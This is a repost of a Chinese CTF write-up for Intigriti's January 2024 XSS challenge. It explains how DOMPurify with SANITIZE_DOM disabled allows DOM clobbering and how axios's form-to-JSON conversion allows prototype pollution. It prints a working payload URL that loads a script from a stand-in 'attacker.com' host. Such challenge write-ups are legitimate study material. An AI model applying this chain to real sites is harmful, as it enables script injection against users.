CTF导航 CTF导航

Intigriti 一月份的 DOM破坏+原型污染 XSS 挑战

渗透技巧 10个月前 admin
51 0 0

Intigriti 一月份的 DOM破坏+原型污染 XSS 挑战

目标:找到一种在 iFramed 页面上执行任意 javascript 的方法并赢得 Intigriti 赠品。

这是一个简单的网页,可以设置用户名并搜索存储库。如果搜索成功,页面将在 iframe 中加载图像和存储库的网站。提供了挑战的来源。

源码分析

后端 – 有趣的端点是“/”:

app.get("/", (req, res) => {    if (!req.query.name) {        res.render("index");  return;    }    res.render("search", {        name: DOMPurify.sanitize(req.query.name, { SANITIZE_DOM: false }),        search: req.query.search    });});

name参数使用DOMPurify进行清理,并将选项SANITIZE_DOM设置为 false。搜索文档:

// disable DOM Clobbering protection on output (default is true, handle with care, minor XSS risks here)const clean = DOMPurify.sanitize(dirty, {SANITIZE_DOM: false});

因此SANITIZE_DOM禁用了针对 DOM Clobbering 的保护。

前端 – 该页面使用axios来检索搜索结果:

<script>    function search(name) {        $("img.loading").attr("hidden", false);
        axios.post("/search", $("#search").get(0), {            "headers": { "Content-Type": "application/json" }        }).then((d) => {            $("img.loading").attr("hidden", true);            const repo = d.data;            if (!repo.owner) {                alert("Not found!");                return;            };
            $("img.avatar").attr("src", repo.owner.avatar_url);            $("#description").text(repo.description);            if (repo.homepage && repo.homepage.startsWith("https://")) {                $("#homepage").attr({                    "src": repo.homepage,                    "hidden": false                });            };        });    };
    window.onload = () => {        const params = new URLSearchParams(location.search);        if (params.get("search")) search();
        $("#search").submit((e) => {            e.preventDefault();            search();        });    };</script>

  • axios 中的客户端原型污染formDataToJSON

搜索表单 HTML 元素直接传递给 axios:$(“#search”).get(0)


Axios 自动从 HTML 表单元素获取要发送的数据,根据此提交formDataToJSON,使用容易受到原型污染的函数


DOM破坏+原型污染 利用

我们可以将名称查询参数设置为:

<form id=search><input name="__proto__.owner" value="x"><input name="__proto__.homepage" value="https://attacker.com/xss.js"></form>

使用此有效负载,所有者检查将被绕过,主页属性将被污染,从而导致 xss 利用:

https://challenge-0124.intigriti.io/challenge?name=%3Cform+id%3dsearch%3E%3Cinput+name%3d%22__proto__.owner%22+value%3d%22x%22%3E%3Cinput+name%3d%22__proto__.homepage%22+value%3d%22https%3a//attacker.com/xss.js%22%3E%3C/form%3E&search=c


  • 还有这篇文章也可以参考参考

https://medium.com/@rodriguezjorgex/how-i-passed-the-intigriti-0124-challenge-b6c2d1cd1b7b



感谢您抽出

Intigriti 一月份的 DOM破坏+原型污染 XSS 挑战

.

Intigriti 一月份的 DOM破坏+原型污染 XSS 挑战

.

Intigriti 一月份的 DOM破坏+原型污染 XSS 挑战

来阅读本文

Intigriti 一月份的 DOM破坏+原型污染 XSS 挑战

点它,分享点赞在看都在这里

原文始发于微信公众号(Ots安全):Intigriti 一月份的 DOM破坏+原型污染 XSS 挑战

版权声明:admin 发表于 2024年1月19日 上午9:59。
转载请注明:Intigriti 一月份的 DOM破坏+原型污染 XSS 挑战 | CTF导航

相关文章

Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)
admin
69
每日安全动态推送(07-22)
admin
865
WordPress 核心代码 SQL注入 (CVE-2022–21661)
admin
1,020
从bypassit1了解POJONode#toString调用getter方法原理
admin
303
Windows Hypervisor Platform魔改版Unicorn Engine
admin
64
CVE-2022-25165: Privilege Escalation to SYSTEM in AWS VPN Client
admin
501

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0